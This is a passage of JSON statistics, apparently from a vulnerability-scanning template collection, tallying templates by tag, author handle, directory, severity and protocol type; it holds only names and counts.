,"count":1},{"name":"listserv","count":1},{"name":"vscode","count":1},{"name":"labtech","count":1},{"name":"chinaunicom","count":1},{"name":"sgp","count":1},{"name":"default","count":1},{"name":"lokalise","count":1},{"name":"shopxo","count":1},{"name":"sangfor","count":1},{"name":"exponentcms","count":1},{"name":"csrf","count":1},{"name":"landray","count":1},{"name":"pgadmin","count":1},{"name":"etouch","count":1},{"name":"node-red-dashboard","count":1},{"name":"sendgrid","count":1},{"name":"viewpoint","count":1},{"name":"redmine","count":1},{"name":"tongda","count":1},{"name":"tileserver","count":1},{"name":"trane","count":1},{"name":"landrayoa","count":1},{"name":"gsoap","count":1},{"name":"pagerduty","count":1},{"name":"buildkite","count":1},{"name":"nette","count":1},{"name":"ewebs","count":1},{"name":"sceditor","count":1},{"name":"gotmls","count":1},{"name":"primetek","count":1},{"name":"mantisbt","count":1},{"name":"vsphere","count":1},{"name":"triconsole","count":1},{"name":"jfrog","count":1},{"name":"uwsgi","count":1},{"name":"ioncube","count":1},{"name":"centos","count":1},{"name":"manager","count":1},{"name":"zend","count":1},{"name":"fcm","count":1},{"name":"fortigate","count":1},{"name":"webui","count":1},{"name":"dom","count":1},{"name":"socomec","count":1},{"name":"mongo","count":1},{"name":"cloudflare","count":1},{"name":"zcms","count":1},{"name":"pendo","count":1},{"name":"vsftpd","count":1},{"name":"azkaban","count":1},{"name":"monitorr","count":1},{"name":"dbeaver","count":1},{"name":"mod-proxy","count":1},{"name":"finereport","count":1},{"name":"ntopng","count":1},{"name":"faraday","count":1},{"name":"servicenow","count":1},{"name":"geutebruck","count":1},{"name":"turbocrm","count":1},{"name":"alertmanager","count":1},{"name":"k8","count":1},{"name":"swagger","count":1},{"name":"csod","count":1},{"name":"bullwark","count":1},{"name":"mysql","count":1},{"name":"octoprint","count":1},{"name":"ambari","count":1},{"name":"zzzcms","count":1},{"name":"daybyday","count":1},{"name":"ssltls","count":1}],"authors":[{"name":"daffainfo","count":288},{"name":"pikpikcu","count":280},{"name":"dhiyaneshdk","count":278},{"name":"pdteam","count":201},{"name":"geeknik","count":162},{"name":"dwisiswant0","count":131},{"name":"gy741","count":81},{"name":"pussycat0x","count":72},{"name":"princechaddha","count":66},{"name":"madrobot","count":63},{"name":"zzeitlin","count":63},{"name":"0x_akoko","count":53},{"name":"gaurang","count":42},{"name":"philippedelteil","count":29},{"name":"ice3man","count":26},{"name":"organiccrap","count":24},{"name":"pr3r00t","count":15},{"name":"sheikhrishad","count":15},{"name":"milo2012","count":14},{"name":"techbrunchfr","count":13},{"name":"suman_kar","count":12},{"name":"r3dg33k","count":11},{"name":"cyllective","count":11},{"name":"melbadry9","count":10},{"name":"righettod","count":10},{"name":"random_robbie","count":10},{"name":"wdahlenb","count":10},{"name":"nadino","count":10},{"name":"hackergautam","count":9},{"name":"aashiq","count":8},{"name":"zh","count":8},{"name":"that_juan_","count":8},{"name":"iamthefrogy","count":8},{"name":"randomstr1ng","count":7},{"name":"dr_set","count":7},{"name":"harshbothra_","count":7},{"name":"meme-lord","count":7},{"name":"0x240x23elu","count":7},{"name":"kophjager007","count":7},{"name":"emadshanab","count":7},{"name":"oppsec","count":7},{"name":"dogasantos","count":7},{"name":"techryptic (@tech)","count":7},{"name":"pentest_swissky","count":6},{"name":"logicalhunter","count":6},{"name":"puzzlepeaches","count":6},{"name":"divya_mudgal","count":6},{"name":"__fazal","count":6},{"name":"caspergn","count":6},{"name":"elsfa7110","count":5},{"name":"rootxharsh","count":5},{"name":"iamnoooob","count":5},{"name":"lu4nx","count":5},{"name":"ganofins","count":5},{"name":"panch0r3d","count":5},{"name":"yanyun","count":5},{"name":"johnk3r","count":5},{"name":"xelkomy","count":5},{"name":"joanbono","count":5},{"name":"e_schultze_","count":4},{"name":"incogbyte","count":4},{"name":"nodauf","count":4},{"name":"tess","count":4},{"name":"github.com/its0x08","count":4},{"name":"0w4ys","count":3},{"name":"sullo","count":3},{"name":"fyoorer","count":3},{"name":"f1tz","count":3},{"name":"me9187","count":3},{"name":"z3bd","count":3},{"name":"yash anand @yashanand155","count":3},{"name":"idealphase","count":3},{"name":"johnjhacking","count":3},{"name":"unstabl3","count":3},{"name":"jarijaas","count":3},{"name":"binaryfigments","count":3},{"name":"emenalf","count":3},{"name":"skeltavik","count":3},{"name":"_generic_human_","count":3},{"name":"shine","count":3},{"name":"sushantkamble","count":3},{"name":"shifacyclewala","count":3},{"name":"impramodsargar","count":3},{"name":"mavericknerd","count":3},{"name":"dudez","count":3},{"name":"vsh00t","count":3},{"name":"thomas_from_offensity","count":3},{"name":"manas_harsh","count":2},{"name":"0xsapra","count":2},{"name":"whoever","count":2},{"name":"randomrobbie","count":2},{"name":"afaq","count":2},{"name":"bsysop","count":2},{"name":"amsda","count":2},{"name":"ehsahil","count":2},{"name":"cocxanh","count":2},{"name":"r12w4n","count":2},{"name":"random-robbie","count":2},{"name":"kiblyn11","count":2},{"name":"0xprial","count":2},{"name":"udit_thakkur","count":2},{"name":"0xsmiley","count":2},{"name":"sy3omda","count":2},{"name":"arcc","count":2},{"name":"w4cky_","count":2},{"name":"r3naissance","count":2},{"name":"nkxxkn","count":2},{"name":"koti2","count":2},{"name":"convisoappsec","count":2},{"name":"gal nagli","count":2},{"name":"gevakun","count":2},{"name":"ree4pwn","count":2},{"name":"zomsop82","count":2},{"name":"dheerajmadhukar","count":2},{"name":"0xrudra","count":2},{"name":"bernardofsr","count":2},{"name":"hetroublemakr","count":2},{"name":"parth","count":2},{"name":"socketz","count":2},{"name":"vavkamil","count":2},{"name":"huowuzhao","count":2},{"name":"fabaff","count":2},{"name":"alifathi-h1","count":2},{"name":"pxmme1337","count":2},{"name":"swissky","count":2},{"name":"0xelkomy","count":2},{"name":"0xcrypto","count":2},{"name":"hahwul","count":2},{"name":"bp0lr","count":2},{"name":"g4l1t0","count":2},{"name":"lotusdll","count":2},{"name":"x1m_martijn","count":2},{"name":"bing0o","count":2},{"name":"joeldeleep","count":2},{"name":"foulenzer","count":2},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"moritz nentwig","count":2},{"name":"mohammedsaneem","count":2},{"name":"davidmckennirey","count":2},{"name":"absshax","count":1},{"name":"andysvints","count":1},{"name":"0xrod","count":1},{"name":"ohlinge","count":1},{"name":"bernardo rodrigues @bernardofsr | andré monteiro @am0nt31r0","count":1},{"name":"52971","count":1},{"name":"0xtavian","count":1},{"name":"alperenkesk","count":1},{"name":"kurohost","count":1},{"name":"defr0ggy","count":1},{"name":"micha3lb3n","count":1},{"name":"its0x08","count":1},{"name":"yavolo","count":1},{"name":"hanlaomo","count":1},{"name":"patralos","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"vzamanillo","count":1},{"name":"lark lab","count":1},{"name":"nvn1729","count":1},{"name":"push4d","count":1},{"name":"wabafet","count":1},{"name":"droberson","count":1},{"name":"furkansenan","count":1},{"name":"orpheus","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"tirtha_mandal","count":1},{"name":"streetofhackerr007","count":1},{"name":"yashanand155","count":1},{"name":"evolutionsec","count":1},{"name":"schniggie","count":1},{"name":"juicypotato1","count":1},{"name":"yashgoti","count":1},{"name":"sec_hawk","count":1},{"name":"zhenwarx","count":1},{"name":"akash.c","count":1},{"name":"affix","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"j33n1k4","count":1},{"name":"streetofhackerr007 (rohit soni)","count":1},{"name":"iampritam","count":1},{"name":"0h1in9e","count":1},{"name":"elmahdi","count":1},{"name":"rotemreiss","count":1},{"name":"mesaglio","count":1},{"name":"clarkvoss","count":1},{"name":"_c0wb0y_","count":1},{"name":"thebinitghimire","count":1},{"name":"qlkwej","count":1},{"name":"ahmetpergamum","count":1},{"name":"exploitation","count":1},{"name":"kabirsuda","count":1},{"name":"jteles","count":1},{"name":"shreyapohekar","count":1},{"name":"borna nematzadeh","count":1},{"name":"rojanrijal","count":1},{"name":"remonsec","count":1},{"name":"shelld3v","count":1},{"name":"co0nan","count":1},{"name":"thevillagehacker","count":1},{"name":"twitter.com/dheerajmadhukar","count":1},{"name":"shifacyclewla","count":1},{"name":"ringo","count":1},{"name":"c3l3si4n","count":1},{"name":"bad5ect0r","count":1},{"name":"s1r1u5_","count":1},{"name":"fopina","count":1},{"name":"0xteles","count":1},{"name":"jrolf","count":1},{"name":"gboddin","count":1},{"name":"luskabol","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"ooooooo_q","count":1},{"name":"soyelmago","count":1},{"name":"berkdusunur","count":1},{"name":"x6263","count":1},{"name":"0ut0fb4nd","count":1},{"name":"pratik khalane","count":1},{"name":"zandros0","count":1},{"name":"b0rn2r00t","count":1},{"name":"whynotke","count":1},{"name":"tim_koopmans","count":1},{"name":"willd96","count":1},{"name":"ldionmarcil","count":1},{"name":"bjhulst","count":1},{"name":"apt-mirror","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"adrianmf","count":1},{"name":"brabbit10","count":1},{"name":"regala_","count":1},{"name":"un-fmunozs","count":1},{"name":"andirrahmani1","count":1},{"name":"naglinagli","count":1},{"name":"noamrathaus","count":1},{"name":"omarkurt","count":1},{"name":"sickwell","count":1},{"name":"nerrorsec","count":1},{"name":"forgedhallpass","count":1},{"name":"intx0x80","count":1},{"name":"akshansh","count":1},{"name":"ilovebinbash","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"d0rkerdevil","count":1},{"name":"smaranchand","count":1},{"name":"manuelbua","count":1},{"name":"toufik airane","count":1},{"name":"rodnt","count":1},{"name":"luci","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"oscarintherocks","count":1},{"name":"kre80r","count":1},{"name":"thezakman","count":1},{"name":"chron0x","count":1},{"name":"@ofjaaah","count":1},{"name":"philippdelteil","count":1},{"name":"xstp","count":1},{"name":"@github.com/defr0ggy","count":1},{"name":"makyotox","count":1},{"name":"geraldino2","count":1},{"name":"elder tao","count":1},{"name":"flag007","count":1},{"name":"pudsec","count":1},{"name":"cristi vlad (@cristivlad25)","count":1},{"name":"bolli95","count":1},{"name":"notsoevilweasel","count":1},{"name":"dawid-czarnecki","count":1},{"name":"knassar702","count":1},{"name":"udyz","count":1},{"name":"alex","count":1},{"name":"revblock","count":1},{"name":"sicksec","count":1},{"name":"mah3sec_","count":1},{"name":"hakluke","count":1},{"name":"ipanda","count":1},{"name":"mhdsamx","count":1},{"name":"mass0ma","count":1},{"name":"b0yd","count":1},{"name":"daviey","count":1},{"name":"izn0u","count":1},{"name":"taielab","count":1},{"name":"elouhi","count":1},{"name":"sshell","count":1},{"name":"retr0","count":1},{"name":"alph4byt3","count":1},{"name":"mubassirpatel","count":1},{"name":"th3.d1p4k","count":1},{"name":"raesene","count":1},{"name":"@dwisiswant0","count":1},{"name":"b4uh0lz","count":1},{"name":"0xd0ff9","count":1},{"name":"aresx","count":1},{"name":"kareemse1im","count":1},{"name":"_darrenmartyn","count":1},{"name":"_harleo","count":1},{"name":"ahmed sherif","count":1},{"name":"undefl0w","count":1},{"name":"ajaysenr","count":1},{"name":"nytr0gen","count":1},{"name":"infosecsanyam","count":1},{"name":"deena","count":1},{"name":"pdp","count":1},{"name":"blckraven","count":1},{"name":"cookiehanhoan","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"becivells","count":1},{"name":"jeya seelan","count":1},{"name":"petruknisme","count":1},{"name":"fmunozs","count":1}],"directory":[{"name":"cves","count":832},{"name":"vulnerabilities","count":327},{"name":"exposed-panels","count":269},{"name":"technologies","count":201},{"name":"exposures","count":191},{"name":"misconfiguration","count":140},{"name":"takeovers","count":65},{"name":"token-spray","count":63},{"name":"default-logins","count":60},{"name":"file","count":50},{"name":"workflows","count":38},{"name":"network","count":32},{"name":"iot","count":27},{"name":"miscellaneous","count":24},{"name":"dns","count":12},{"name":"fuzzing","count":10},{"name":"cnvd","count":9},{"name":"headless","count":5}],"severity":[{"name":"info","count":749},{"name":"high","count":645},{"name":"medium","count":474},{"name":"critical","count":294},{"name":"low","count":155}],"types":[{"name":"http","count":2205},{"name":"file","count":50},{"name":"network","count":45},{"name":"dns","count":12}]} +{"tags":[{"name":"cve","count":827},{"name":"lfi","count":337},{"name":"panel","count":267},{"name":"xss","count":258},{"name":"wordpress","count":249},{"name":"exposure","count":239},{"name":"rce","count":212},{"name":"tech","count":195},{"name":"wp-plugin","count":172},{"name":"cve2020","count":164},{"name":"cve2021","count":155},{"name":"joomla","count":128},{"name":"cve2010","count":109},{"name":"cve2019","count":97},{"name":"config","count":95},{"name":"cve2018","count":88},{"name":"apache","count":73},{"name":"takeover","count":69},{"name":"default-login","count":68},{"name":"oob","count":68},{"name":"iot","count":68},{"name":"token","count":67},{"name":"token-spray","count":63},{"name":"cve2017","count":51},{"name":"file","count":50},{"name":"unauth","count":49},{"name":"network","count":43},{"name":"ssrf","count":41},{"name":"sqli","count":40},{"name":"","count":38},{"name":"redirect","count":37},{"name":"cve2016","count":37},{"name":"oracle","count":36},{"name":"logs","count":30},{"name":"google","count":30},{"name":"atlassian","count":28},{"name":"jira","count":28},{"name":"cve2015","count":28},{"name":"cisco","count":27},{"name":"listing","count":27},{"name":"cve2014","count":27},{"name":"generic","count":24},{"name":"auth-bypass","count":23},{"name":"misc","count":23},{"name":"disclosure","count":23},{"name":"router","count":21},{"name":"misconfig","count":20},{"name":"aem","count":19},{"name":"springboot","count":18},{"name":"cve2012","count":18},{"name":"sap","count":18},{"name":"debug","count":18},{"name":"php","count":16},{"name":"devops","count":15},{"name":"cve2011","count":15},{"name":"login","count":14},{"name":"struts","count":14},{"name":"weblogic","count":14},{"name":"aws","count":14},{"name":"cve2009","count":14},{"name":"fuzz","count":14},{"name":"dns","count":13},{"name":"android","count":13},{"name":"zoho","count":13},{"name":"adobe","count":13},{"name":"deserialization","count":13},{"name":"jenkins","count":12},{"name":"manageengine","count":12},{"name":"dlink","count":12},{"name":"wp-theme","count":12},{"name":"cve2013","count":11},{"name":"magento","count":11},{"name":"intrusive","count":10},{"name":"hp","count":10},{"name":"dell","count":10},{"name":"xxe","count":10},{"name":"kubernetes","count":9},{"name":"ftp","count":9},{"name":"vmware","count":9},{"name":"nginx","count":8},{"name":"backup","count":8},{"name":"cve2008","count":8},{"name":"ruijie","count":8},{"name":"fastjson","count":8},{"name":"cnvd","count":8},{"name":"rails","count":8},{"name":"ibm","count":8},{"name":"microsoft","count":8},{"name":"airflow","count":8},{"name":"gitlab","count":8},{"name":"scada","count":8},{"name":"coldfusion","count":7},{"name":"cms","count":7},{"name":"confluence","count":7},{"name":"files","count":7},{"name":"netgear","count":7},{"name":"api","count":6},{"name":"camera","count":6},{"name":"django","count":6},{"name":"citrix","count":6},{"name":"laravel","count":6},{"name":"jetty","count":6},{"name":"rconfig","count":6},{"name":"drupal","count":6},{"name":"nodejs","count":6},{"name":"docker","count":6},{"name":"lucee","count":6},{"name":"solr","count":6},{"name":"fileupload","count":6},{"name":"ssti","count":5},{"name":"tomcat","count":5},{"name":"circarlife","count":5},{"name":"phpmyadmin","count":5},{"name":"iis","count":5},{"name":"java","count":5},{"name":"crlf","count":5},{"name":"printer","count":5},{"name":"jolokia","count":5},{"name":"windows","count":5},{"name":"headless","count":5},{"name":"dedecms","count":5},{"name":"symantec","count":4},{"name":"traversal","count":4},{"name":"solarwinds","count":4},{"name":"zimbra","count":4},{"name":"webserver","count":4},{"name":"asp","count":4},{"name":"artifactory","count":4},{"name":"firmware","count":4},{"name":"git","count":4},{"name":"exchange","count":4},{"name":"thinkcmf","count":4},{"name":"moodle","count":4},{"name":"zabbix","count":4},{"name":"symfony","count":4},{"name":"amazon","count":4},{"name":"glpi","count":4},{"name":"thinkphp","count":4},{"name":"maps","count":4},{"name":"hongdian","count":4},{"name":"firebase","count":4},{"name":"strapi","count":4},{"name":"resin","count":4},{"name":"buffalo","count":4},{"name":"vpn","count":4},{"name":"proxy","count":4},{"name":"grafana","count":4},{"name":"fatpipe","count":4},{"name":"npm","count":4},{"name":"magmi","count":4},{"name":"wso2","count":4},{"name":"slack","count":4},{"name":"samsung","count":4},{"name":"rfi","count":4},{"name":"elastic","count":4},{"name":"vbulletin","count":3},{"name":"bitrix","count":3},{"name":"springcloud","count":3},{"name":"targa","count":3},{"name":"ssh","count":3},{"name":"fpd","count":3},{"name":"nexus","count":3},{"name":"kafka","count":3},{"name":"druid","count":3},{"name":"r-seenet","count":3},{"name":"cve2007","count":3},{"name":"fanruan","count":3},{"name":"backdoor","count":3},{"name":"telerik","count":3},{"name":"lfr","count":3},{"name":"microstrategy","count":3},{"name":"zhiyuan","count":3},{"name":"mail","count":3},{"name":"azure","count":3},{"name":"search","count":3},{"name":"injection","count":3},{"name":"exposures","count":3},{"name":"bigip","count":3},{"name":"prometheus","count":3},{"name":"ofbiz","count":3},{"name":"jeesns","count":3},{"name":"httpd","count":3},{"name":"terramaster","count":3},{"name":"ebs","count":3},{"name":"caucho","count":3},{"name":"github","count":3},{"name":"cloud","count":3},{"name":"mongodb","count":3},{"name":"kibana","count":3},{"name":"nacos","count":3},{"name":"nosqli","count":3},{"name":"node","count":3},{"name":"hoteldruid","count":3},{"name":"itop","count":3},{"name":"jellyfin","count":3},{"name":"log","count":3},{"name":"linkerd","count":3},{"name":"opensis","count":3},{"name":"openssh","count":3},{"name":"kevinlab","count":3},{"name":"openam","count":3},{"name":"oa","count":3},{"name":"cves","count":3},{"name":"smtp","count":3},{"name":"tikiwiki","count":3},{"name":"lansweeper","count":3},{"name":"cacti","count":3},{"name":"paloalto","count":2},{"name":"ec2","count":2},{"name":"mailchimp","count":2},{"name":"huawei","count":2},{"name":"cve2005","count":2},{"name":"enumeration","count":2},{"name":"dos","count":2},{"name":"openfire","count":2},{"name":"nextcloud","count":2},{"name":"grav","count":2},{"name":"igs","count":2},{"name":"nextjs","count":2},{"name":"bucket","count":2},{"name":"couchdb","count":2},{"name":"maian","count":2},{"name":"qihang","count":2},{"name":"smb","count":2},{"name":"horde","count":2},{"name":"shellshock","count":2},{"name":"waf","count":2},{"name":"s3","count":2},{"name":"status","count":2},{"name":"geowebserver","count":2},{"name":"aviatrix","count":2},{"name":"hostheader-injection","count":2},{"name":"backups","count":2},{"name":"spark","count":2},{"name":"commax","count":2},{"name":"activemq","count":2},{"name":"linux","count":2},{"name":"liferay","count":2},{"name":"jsf","count":2},{"name":"jboss","count":2},{"name":"yapi","count":2},{"name":"ecoa","count":2},{"name":"lotus","count":2},{"name":"akkadian","count":2},{"name":"text","count":2},{"name":"seeyon","count":2},{"name":"avantfax","count":2},{"name":"pega","count":2},{"name":"db","count":2},{"name":"justwriting","count":2},{"name":"adminer","count":2},{"name":"kentico","count":2},{"name":"bruteforce","count":2},{"name":"rockmongo","count":2},{"name":"ucmdb","count":2},{"name":"plesk","count":2},{"name":"places","count":2},{"name":"sonicwall","count":2},{"name":"sitecore","count":2},{"name":"wordfence","count":2},{"name":"prtg","count":2},{"name":"netis","count":2},{"name":"globalprotect","count":2},{"name":"dolibarr","count":2},{"name":"prestashop","count":2},{"name":"upload","count":2},{"name":"mida","count":2},{"name":"chiyu","count":2},{"name":"frp","count":2},{"name":"payara","count":2},{"name":"keycloak","count":2},{"name":"harbor","count":2},{"name":"fortios","count":2},{"name":"icewarp","count":2},{"name":"emerge","count":2},{"name":"minio","count":2},{"name":"trixbox","count":2},{"name":"ilo","count":2},{"name":"vcenter","count":2},{"name":"heroku","count":2},{"name":"guacamole","count":2},{"name":"kong","count":2},{"name":"hpe","count":2},{"name":"natshell","count":2},{"name":"totemomail","count":2},{"name":"aruba","count":2},{"name":"ecology","count":2},{"name":"service","count":2},{"name":"yii","count":2},{"name":"akamai","count":2},{"name":"hashicorp","count":2},{"name":"chamilo","count":2},{"name":"nagios","count":2},{"name":"xxljob","count":2},{"name":"axis","count":2},{"name":"bitly","count":2},{"name":"mcafee","count":2},{"name":"netsweeper","count":2},{"name":"axis2","count":2},{"name":"sharepoint","count":2},{"name":"splunk","count":2},{"name":"vrealize","count":2},{"name":"hjtcloud","count":2},{"name":"idrac","count":2},{"name":"rancher","count":2},{"name":"leak","count":2},{"name":"qcubed","count":2},{"name":"glassfish","count":2},{"name":"chyrp","count":2},{"name":"voipmonitor","count":2},{"name":"embed","count":2},{"name":"phpcollab","count":2},{"name":"electron","count":2},{"name":"bypass","count":2},{"name":"rstudio","count":2},{"name":"storage","count":2},{"name":"tidb","count":2},{"name":"odoo","count":2},{"name":"cache","count":2},{"name":"favicon","count":2},{"name":"sonarqube","count":2},{"name":"saltstack","count":2},{"name":"wuzhicms","count":2},{"name":"flir","count":2},{"name":"getsimple","count":2},{"name":"jeedom","count":2},{"name":"oauth","count":2},{"name":"showdoc","count":2},{"name":"hasura","count":2},{"name":"openvpn","count":2},{"name":"webcam","count":2},{"name":"middleware","count":2},{"name":"wmt","count":1},{"name":"route","count":1},{"name":"office365","count":1},{"name":"shoretel","count":1},{"name":"hiawatha","count":1},{"name":"blue-ocean","count":1},{"name":"openrestry","count":1},{"name":"fiori","count":1},{"name":"playable","count":1},{"name":"acme","count":1},{"name":"sangfor","count":1},{"name":"cockpit","count":1},{"name":"jitsi","count":1},{"name":"wazuh","count":1},{"name":"extractor","count":1},{"name":"node-red-dashboard","count":1},{"name":"graphql","count":1},{"name":"iceflow","count":1},{"name":"nsasg","count":1},{"name":"karel","count":1},{"name":"nedi","count":1},{"name":"mdb","count":1},{"name":"selea","count":1},{"name":"mariadb","count":1},{"name":"sidekiq","count":1},{"name":"redis","count":1},{"name":"messaging","count":1},{"name":"openemr","count":1},{"name":"cve202","count":1},{"name":"episerver","count":1},{"name":"aura","count":1},{"name":"netmask","count":1},{"name":"mongo","count":1},{"name":"adb","count":1},{"name":"starttls","count":1},{"name":"huijietong","count":1},{"name":"gilacms","count":1},{"name":"resourcespace","count":1},{"name":"razor","count":1},{"name":"adiscon","count":1},{"name":"wifisky","count":1},{"name":"feifeicms","count":1},{"name":"spotify","count":1},{"name":"yealink","count":1},{"name":"rdp","count":1},{"name":"jfrog","count":1},{"name":"oscommerce","count":1},{"name":"interlib","count":1},{"name":"landrayoa","count":1},{"name":"testrail","count":1},{"name":"ecom","count":1},{"name":"discord","count":1},{"name":"traefik","count":1},{"name":"circontrorl","count":1},{"name":"dompdf","count":1},{"name":"manager","count":1},{"name":"tamronos","count":1},{"name":"opentsdb","count":1},{"name":"meraki","count":1},{"name":"stripe","count":1},{"name":"plc","count":1},{"name":"trane","count":1},{"name":"weglot","count":1},{"name":"blackboard","count":1},{"name":"tieline","count":1},{"name":"centos","count":1},{"name":"tongda","count":1},{"name":"comodo","count":1},{"name":"gsoap","count":1},{"name":"ems","count":1},{"name":"mara","count":1},{"name":"avalanche","count":1},{"name":"redmine","count":1},{"name":"concrete","count":1},{"name":"expose","count":1},{"name":"darkstat","count":1},{"name":"elascticsearch","count":1},{"name":"linkedin","count":1},{"name":"panos","count":1},{"name":"iptime","count":1},{"name":"hubspot","count":1},{"name":"deviantart","count":1},{"name":"bing","count":1},{"name":"dotnet","count":1},{"name":"klog","count":1},{"name":"circleci","count":1},{"name":"streetview","count":1},{"name":"visualstudio","count":1},{"name":"graphite","count":1},{"name":"woocommerce","count":1},{"name":"exacqvision","count":1},{"name":"find","count":1},{"name":"tika","count":1},{"name":"jenzabar","count":1},{"name":"details","count":1},{"name":"flink","count":1},{"name":"fuelcms","count":1},{"name":"travis","count":1},{"name":"bedita","count":1},{"name":"spf","count":1},{"name":"solarlog","count":1},{"name":"cve2006","count":1},{"name":"stem","count":1},{"name":"fcm","count":1},{"name":"minimouse","count":1},{"name":"phpunit","count":1},{"name":"square","count":1},{"name":"mirai","count":1},{"name":"ilo4","count":1},{"name":"openx","count":1},{"name":"cerebro","count":1},{"name":"emby","count":1},{"name":"smi","count":1},{"name":"azkaban","count":1},{"name":"svn","count":1},{"name":"zookeeper","count":1},{"name":"zte","count":1},{"name":"proftpd","count":1},{"name":"spidercontrol","count":1},{"name":"etouch","count":1},{"name":"xampp","count":1},{"name":"mkdocs","count":1},{"name":"ricoh","count":1},{"name":"listserv","count":1},{"name":"finereport","count":1},{"name":"tensorboard","count":1},{"name":"vscode","count":1},{"name":"shiro","count":1},{"name":"email","count":1},{"name":"diris","count":1},{"name":"zeroshell","count":1},{"name":"zarafa","count":1},{"name":"package","count":1},{"name":"alerta","count":1},{"name":"aspnuke","count":1},{"name":"artica","count":1},{"name":"default","count":1},{"name":"tjws","count":1},{"name":"rockethchat","count":1},{"name":"cse","count":1},{"name":"labtech","count":1},{"name":"netgenie","count":1},{"name":"kafdrop","count":1},{"name":"totaljs","count":1},{"name":" default-login","count":1},{"name":"csrf","count":1},{"name":"codemeter","count":1},{"name":"glowroot","count":1},{"name":"wiki","count":1},{"name":"qdpm","count":1},{"name":"commscope","count":1},{"name":"jnoj","count":1},{"name":"scs","count":1},{"name":"auth","count":1},{"name":"szhe","count":1},{"name":"plugin","count":1},{"name":"maccmsv10","count":1},{"name":"luftguitar","count":1},{"name":"lg-nas","count":1},{"name":"codeigniter","count":1},{"name":"triconsole","count":1},{"name":"sophos","count":1},{"name":"dotnetnuke","count":1},{"name":"sql","count":1},{"name":"mrtg","count":1},{"name":"soar","count":1},{"name":"yachtcontrol","count":1},{"name":"wondercms","count":1},{"name":"cves2001","count":1},{"name":"geolocation","count":1},{"name":"emc","count":1},{"name":"dom","count":1},{"name":"erp-nc","count":1},{"name":"ambari","count":1},{"name":"krweb","count":1},{"name":"floc","count":1},{"name":"dvr","count":1},{"name":"directions","count":1},{"name":"dnssec","count":1},{"name":"keenetic","count":1},{"name":"plone","count":1},{"name":"ssltls","count":1},{"name":"weather","count":1},{"name":"hiboss","count":1},{"name":"jmx","count":1},{"name":"contentkeeper","count":1},{"name":"centreon","count":1},{"name":"ns","count":1},{"name":"panasonic","count":1},{"name":"calendarix","count":1},{"name":"crm","count":1},{"name":"optiLink","count":1},{"name":"esmtp","count":1},{"name":"zenario","count":1},{"name":"owasp","count":1},{"name":"geocode","count":1},{"name":"k8s","count":1},{"name":"moin","count":1},{"name":"graylog","count":1},{"name":"opm","count":1},{"name":"exponentcms","count":1},{"name":"domxss","count":1},{"name":"metinfo","count":1},{"name":"ulterius","count":1},{"name":"zcms","count":1},{"name":"pulsesecure","count":1},{"name":"panabit","count":1},{"name":"viewpoint","count":1},{"name":"cors","count":1},{"name":"rocketchat","count":1},{"name":"qvisdvr","count":1},{"name":"pagespeed","count":1},{"name":"visionhub","count":1},{"name":"timeclock","count":1},{"name":"grails","count":1},{"name":"lokalise","count":1},{"name":"roads","count":1},{"name":"timezone","count":1},{"name":"clusterengine","count":1},{"name":"phpwiki","count":1},{"name":"fortinet","count":1},{"name":"pivotaltracker","count":1},{"name":"metabase","count":1},{"name":"idemia","count":1},{"name":"place","count":1},{"name":"acontent","count":1},{"name":"twitter","count":1},{"name":"miscrsoft","count":1},{"name":"nuuo","count":1},{"name":"monitorr","count":1},{"name":"bingmaps","count":1},{"name":"smartblog","count":1},{"name":"javascript","count":1},{"name":"zm","count":1},{"name":"blind","count":1},{"name":"tcexam","count":1},{"name":"sureline","count":1},{"name":"gotmls","count":1},{"name":"buildkite","count":1},{"name":"limit","count":1},{"name":"distance","count":1},{"name":"doh","count":1},{"name":"netrc","count":1},{"name":"trilithic","count":1},{"name":"landray","count":1},{"name":"lotuscms","count":1},{"name":"hortonworks","count":1},{"name":"wooyun","count":1},{"name":"gateone","count":1},{"name":"shopxo","count":1},{"name":"seacms","count":1},{"name":"dbeaver","count":1},{"name":"pyramid","count":1},{"name":"sendgrid","count":1},{"name":"dvwa","count":1},{"name":"websvn","count":1},{"name":"iterable","count":1},{"name":"jaspersoft","count":1},{"name":"fortigate","count":1},{"name":"circontrol","count":1},{"name":"javamelody","count":1},{"name":"sourcebans","count":1},{"name":"arl","count":1},{"name":"beanstalk","count":1},{"name":"sage","count":1},{"name":"solman","count":1},{"name":"netdata","count":1},{"name":"shopware","count":1},{"name":"flexbe","count":1},{"name":"syslog","count":1},{"name":"cscart","count":1},{"name":"cofax","count":1},{"name":"bazarr","count":1},{"name":"redhat","count":1},{"name":"froxlor","count":1},{"name":"gurock","count":1},{"name":"apiman","count":1},{"name":"apos","count":1},{"name":"gridx","count":1},{"name":"thinkadmin","count":1},{"name":"okta","count":1},{"name":"moinmoin","count":1},{"name":"dotclear","count":1},{"name":"lighttpd","count":1},{"name":"elevation","count":1},{"name":"cloudinary","count":1},{"name":"yzmcms","count":1},{"name":"gitlist","count":1},{"name":"couchbase","count":1},{"name":"hadoop","count":1},{"name":"autocomplete","count":1},{"name":"ruckus","count":1},{"name":"jumpcloud","count":1},{"name":"tapestry","count":1},{"name":"rsyncd","count":1},{"name":"tinypng","count":1},{"name":"dropbox","count":1},{"name":"api-manager","count":1},{"name":"gitea","count":1},{"name":"terraform","count":1},{"name":"gstorage","count":1},{"name":"rabbitmq","count":1},{"name":"servicenow","count":1},{"name":"loganalyzer","count":1},{"name":"jquery","count":1},{"name":"influxdb","count":1},{"name":"swagger","count":1},{"name":"ssl","count":1},{"name":"webmin","count":1},{"name":"clockwatch","count":1},{"name":"drone","count":1},{"name":"clickhouse","count":1},{"name":"mautic","count":1},{"name":"memcached","count":1},{"name":"gunicorn","count":1},{"name":"sco","count":1},{"name":"beanshell","count":1},{"name":"fastapi","count":1},{"name":"phpshowtime","count":1},{"name":"alibaba","count":1},{"name":"bolt","count":1},{"name":"newrelic","count":1},{"name":"vsftpd","count":1},{"name":"asana","count":1},{"name":"instagram","count":1},{"name":"secmail","count":1},{"name":"lancom","count":1},{"name":"speed","count":1},{"name":"pacsone","count":1},{"name":"bigbluebutton","count":1},{"name":"raspap","count":1},{"name":"webftp","count":1